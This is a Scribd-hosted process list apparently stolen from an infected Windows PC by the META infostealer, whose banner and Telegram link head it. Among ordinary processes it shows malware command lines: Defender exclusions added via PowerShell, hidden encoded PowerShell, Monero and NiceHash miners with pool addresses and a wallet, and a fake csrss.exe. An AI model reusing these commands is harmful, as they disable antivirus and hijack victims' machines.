0% found this document useful (0 votes)
119 views6 pages

Process List

The document lists process information from a Windows system, including the process ID, name, and command line. There are many system processes like explorer.exe and svchost.exe as well as user applications like Discord and Internet Download Manager running.

Uploaded by

blackcaliber44
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
119 views6 pages

Process List

The document lists process information from a Windows system, including the process ID, name, and command line. There are many system processes like explorer.exe and svchost.exe as well as user applications like Discord and Internet Download Manager running.

Uploaded by

blackcaliber44
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 6

***********************************************

* _ _ _ _ *
* / \ / \ / \ / \ *
* ( M | E | T | A ) *
* \_/ \_/ \_/ \_/ *
* *
* Telegram: https://t.me/metastealer_bot *
***********************************************

ID: 740, Name: csrss.exe, CommandLine:


===============
ID: 800, Name: winlogon.exe, CommandLine: winlogon.exe
===============
ID: 468, Name: fontdrvhost.exe, CommandLine: "fontdrvhost.exe"
===============
ID: 1196, Name: dwm.exe, CommandLine: "dwm.exe"
===============
ID: 4176, Name: sihost.exe, CommandLine: sihost.exe
===============
ID: 4156, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup -s CDPUserSvc
===============
ID: 3660, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup -s WpnUserService
===============
ID: 5128, Name: taskhostw.exe, CommandLine: taskhostw.exe {222A245B-E637-4AE9-A93F-
A59CA119A75E}
===============
ID: 5372, Name: ctfmon.exe, CommandLine: "ctfmon.exe"
===============
ID: 5804, Name: explorer.exe, CommandLine: C:\Windows\Explorer.EXE
===============
ID: 5932, Name: igfxEM.exe, CommandLine: "C:\Windows\System32\DriverStore\
FileRepository\cui_dch.inf_amd64_38cfab2b652e4701\igfxEM.exe"
===============
ID: 6096, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
ClipboardSvcGroup -p -s cbdhsvc
===============
ID: 6620, Name: StartMenuExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\
StartMenuExperienceHost.exe" -
ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
===============
ID: 6792, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 7012, Name: SearchApp.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -
ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
===============
ID: 6304, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 4596, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 6048, Name: SecurityHealthSystray.exe, CommandLine: "C:\Windows\System32\
SecurityHealthSystray.exe"
===============
ID: 8152, Name: OneDrive.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Microsoft\
OneDrive\OneDrive.exe" /background
===============
ID: 5840, Name: Discord.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Discord\app-
1.0.9012\Discord.exe"
===============
ID: 7232, Name: ShellExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -
ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
===============
ID: 8120, Name: Discord.exe, CommandLine: C:\Users\ASUS\AppData\Local\Discord\app-
1.0.9012\Discord.exe --type=crashpad-handler --user-data-dir=C:\Users\ASUS\AppData\
Roaming\discord /prefetch:7 --no-rate-limit --monitor-self-
annotation=ptype=crashpad-handler --database=C:\Users\ASUS\AppData\Roaming\discord\
Crashpad --url=https://sentry.io/api/146342/minidump/?
sentry_key=384ce4413de74fe0be270abe03b2b35a "--annotation=_companyName=Discord
Inc." --annotation=_productName=Discord --annotation=_version=1.0.9012 --
annotation=plat=Win32 --annotation=prod=Electron --annotation=ver=22.3.2 --initial-
client-data=0x49c,0x480,0x414,0x498,0x410,0x85aef78,0x85aef88,0x85aef94
===============
ID: 7296, Name: IDMan.exe, CommandLine: "C:\Program Files (x86)\Internet Download
Manager\IDMan.exe" /onboot
===============
ID: 8352, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 8580, Name: Discord.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Discord\app-
1.0.9012\Discord.exe" --type=gpu-process --user-data-dir="C:\Users\ASUS\AppData\
Roaming\discord" --gpu-
preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAA
AAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAA
AOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-
handle=1780 --field-trial-
handle=1796,i,7767546970753870870,4083573489537264221,131072 --disable-
features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProces
s,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
===============
ID: 8768, Name: Discord.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Discord\app-
1.0.9012\Discord.exe" --type=utility --utility-sub-
type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-
data-dir="C:\Users\ASUS\AppData\Roaming\discord" --mojo-platform-channel-
handle=2200 --field-trial-
handle=1796,i,7767546970753870870,4083573489537264221,131072 --disable-
features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProces
s,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
===============
ID: 9304, Name: RtkAudUService64.exe, CommandLine: C:\Windows\System32\
RtkAudUService64.exe -background
===============
ID: 8684, Name: Discord.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Discord\app-
1.0.9012\Discord.exe" --type=renderer --user-data-dir="C:\Users\ASUS\AppData\
Roaming\discord" --app-user-model-id=com.squirrel.Discord.Discord --app-path="C:\
Users\ASUS\AppData\Local\Discord\app-1.0.9012\resources\app.asar" --no-sandbox --
no-zygote --autoplay-policy=no-user-gesture-required --lang=en-US --device-scale-
factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-
client-id=5 --time-ticks-at-unix-epoch=-1681893985127383 --launch-time-
ticks=59915891 --mojo-platform-channel-handle=3476 --field-trial-
handle=1796,i,7767546970753870870,4083573489537264221,131072 --disable-
features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProces
s,WinRetrieveSuggestionsOnlyOnDemand --enable-node-leakage-in-renderers /prefetch:1
===============
ID: 10672, Name: java.exe, CommandLine: C:\Users\ASUS\AppData\Roaming\Java\jre8\
bin\java.exe --expose-gc C:\Users\ASUS\AppData\Roaming\Java\jre8\bin\java.exe:jnl
===============
ID: 11100, Name: TextInputHost.exe, CommandLine: "C:\Windows\SystemApps\
MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -
ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
===============
ID: 9112, Name: Discord.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Discord\app-
1.0.9012\Discord.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --
lang=en-US --service-sandbox-type=audio --user-data-dir="C:\Users\ASUS\AppData\
Roaming\discord" --mojo-platform-channel-handle=2648 --field-trial-
handle=1796,i,7767546970753870870,4083573489537264221,131072 --disable-
features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProces
s,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
===============
ID: 10924, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup
===============
ID: 9092, Name: LockApp.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe" -
ServerName:WindowsDefaultLockScreen.AppX7y4nbzq37zn4ks9k7amqjywdat7d3j2z.mca
===============
ID: 392, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 2848, Name: CompPkgSrv.exe, CommandLine: C:\Windows\System32\CompPkgSrv.exe -
Embedding
===============
ID: 4888, Name: RtkUWP.exe, CommandLine: "C:\Program Files\WindowsApps\
RealtekSemiconductorCorp.RealtekAudioControl_1.1.137.0_x64__dt26b99r8h8gj\
RtkUWP.exe" -ServerName:App.AppX2vzv616czv2j97f46vn25b5ksjvhr8z1.mca
===============
ID: 2004, Name: ApplicationFrameHost.exe, CommandLine: C:\Windows\system32\
ApplicationFrameHost.exe -Embedding
===============
ID: 7996, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 5712, Name: wpscloudsvr.exe, CommandLine: "C:\Users\ASUS\AppData\Local\
Kingsoft\WPS Office\11.2.0.11516\office6\wpscloudsvr.exe" /wpscloudlaunch
/run_plugin /plugin_name=ktaskschdtool /plugin_entry=ktaskschdtool.dll
/task=wpsexternal /launchtask /ver=1.0 /start_from=task_external
===============
ID: 5012, Name: mstsca.exe, CommandLine: C:\Users\ASUS\AppData\Roaming\Microsoft\
Network\mstsca.exe
===============
ID: 6548, Name: wpscenter.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Kingsoft\
WPS Office\11.2.0.11516\office6/wpscenter.exe" Run -Entry=EntryPoint "C:\Users\
ASUS\AppData\Roaming\Kingsoft/wps/addons/pool/win-i386/kdocreminder_1.1.2021.65/
kdocreminder.dll"
===============
ID: 4712, Name: 3A56.exe, CommandLine: C:\Users\ASUS\AppData\Local\f46f4670-506e-
4b11-84f8-99261ddf6dc7\3A56.exe --Task
===============
ID: 8464, Name: powershell.exe, CommandLine: "powershell" -Command Add-
MpPreference -ExclusionPath 'C:\ProgramData'
===============
ID: 4756, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 8524, Name: explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe
===============
ID: 10396, Name: explorer.exe, CommandLine: C:\Windows\explorer.exe
===============
ID: 4892, Name: explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe
===============
ID: 668, Name: explorer.exe, CommandLine: C:\Windows\explorer.exe
===============
ID: 8344, Name: explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe
===============
ID: 11252, Name: explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe
===============
ID: 6764, Name: explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe
===============
ID: 4580, Name: explorer.exe, CommandLine: C:\Windows\explorer.exe
===============
ID: 6588, Name: explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe
===============
ID: 2744, Name: vbc.exe, CommandLine: C:\Windows\Microsoft.NET\Framework64\
v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u
4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5
vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
===============
ID: 7360, Name: WBGRGV.exe, CommandLine: C:\ProgramData\portableWin\WBGRGV.exe
===============
ID: 9088, Name: powershell.exe, CommandLine: "powershell" -Command Add-
MpPreference -ExclusionPath 'C:\ProgramData'
===============
ID: 5584, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 8160, Name: RegSvcs.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegSvcs.exe"
===============
ID: 6148, Name: smartscreen.exe, CommandLine: C:\Windows\System32\smartscreen.exe -
Embedding
===============
ID: 1324, Name: koPamCs_vM7jHvyfackwRCVE.exe, CommandLine: "C:\Users\ASUS\Pictures\
Minor Policy\koPamCs_vM7jHvyfackwRCVE.exe"
===============
ID: 10920, Name: koPamCs_vM7jHvyfackwRCVE.exe, CommandLine: "C:\Users\ASUS\
Pictures\Minor Policy\koPamCs_vM7jHvyfackwRCVE.exe"
===============
ID: 6660, Name: lttZ9ZMSNstwv47LDDLSi0EM.exe, CommandLine: "C:\Users\ASUS\Pictures\
Minor Policy\lttZ9ZMSNstwv47LDDLSi0EM.exe"
===============
ID: 9872, Name: lttZ9ZMSNstwv47LDDLSi0EM.exe, CommandLine: "C:\Users\ASUS\Pictures\
Minor Policy\lttZ9ZMSNstwv47LDDLSi0EM.exe"
===============
ID: 1316, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 9568, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 5524, Name: node.exe, CommandLine: node.exe node.lib 3956101466505 1929564397
===============
ID: 8308, Name: HxTsr.exe, CommandLine: "C:\Program Files\WindowsApps\
microsoft.windowscommunicationsapps_16005.14326.21374.0_x64__8wekyb3d8bbwe\
HxTsr.exe" -ServerName:Hx.IPC.Server
===============
ID: 9752, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 11124, Name: powershell.exe, CommandLine: C:\Windows\System32\
WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand
cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZAB
lAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
===============
ID: 5996, Name: powershell.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\
v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand
cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZAB
lAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
===============
ID: 6596, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 9156, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 244, Name: wnb70KIsW65hvwPVbukgwPFK.exe, CommandLine: "C:\Users\ASUS\Pictures\
Minor Policy\wnb70KIsW65hvwPVbukgwPFK.exe"
===============
ID: 7892, Name: is-O532D.tmp, CommandLine: "C:\Users\ASUS\AppData\Local\Temp\is-
BEIKE.tmp\is-O532D.tmp" /SL4 $C02C6 "C:\Users\ASUS\Pictures\Minor Policy\
wnb70KIsW65hvwPVbukgwPFK.exe" 2562561 56320
===============
ID: 11468, Name: powershell.exe, CommandLine: C:\Windows\System32\
WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand
cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZAB
lAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
===============
ID: 11964, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 13012, Name: taskhostw.exe, CommandLine: taskhostw.exe
===============
ID: 4172, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --restore-last-session
===============
ID: 6132, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\ASUS\
AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-
annotation=ptype=crashpad-handler "--database=C:\Users\ASUS\AppData\Local\Google\
Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --
annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --
annotation=ver=112.0.5615.122 --initial-client-
data=0xe8,0x188,0x1c4,0xe4,0x1c8,0x7ffafcdeaa60,0x7ffafcdeaa70,0x7ffafcdeaa80
===============
ID: 10716, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 5332, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 4560, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 5152, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=gpu-process --gpu-
preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAA
AAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-
platform-channel-handle=1900 --field-trial-
handle=1980,i,3186326931205788530,10113752326107017979,131072 /prefetch:2
===============
ID: 10016, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=utility --utility-sub-
type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-
platform-channel-handle=2160 --field-trial-
handle=1980,i,3186326931205788530,10113752326107017979,131072 /prefetch:8
===============
ID: 4200, Name: wup.exe, CommandLine: C:\Users\ASUS\AppData\Local\Temp\csrss\wup\
xarch\wup.exe -o dxpools.net:40001 --rig-id 170aff50-3414-460e-ac6b-4ab10e102304 --
tls --nicehash -o dxpools.net:443 --rig-id 170aff50-3414-460e-ac6b-4ab10e102304 --
tls --nicehash -o dxpools.net:80 --rig-id 170aff50-3414-460e-ac6b-4ab10e102304 --
nicehash --http-port 3433 --http-access-token 170aff50-3414-460e-ac6b-4ab10e102304
--randomx-wrmsr=-1
===============
ID: 12468, Name: csrss.exe, CommandLine: C:\Windows\rss\csrss.exe -hide 4200

You might also like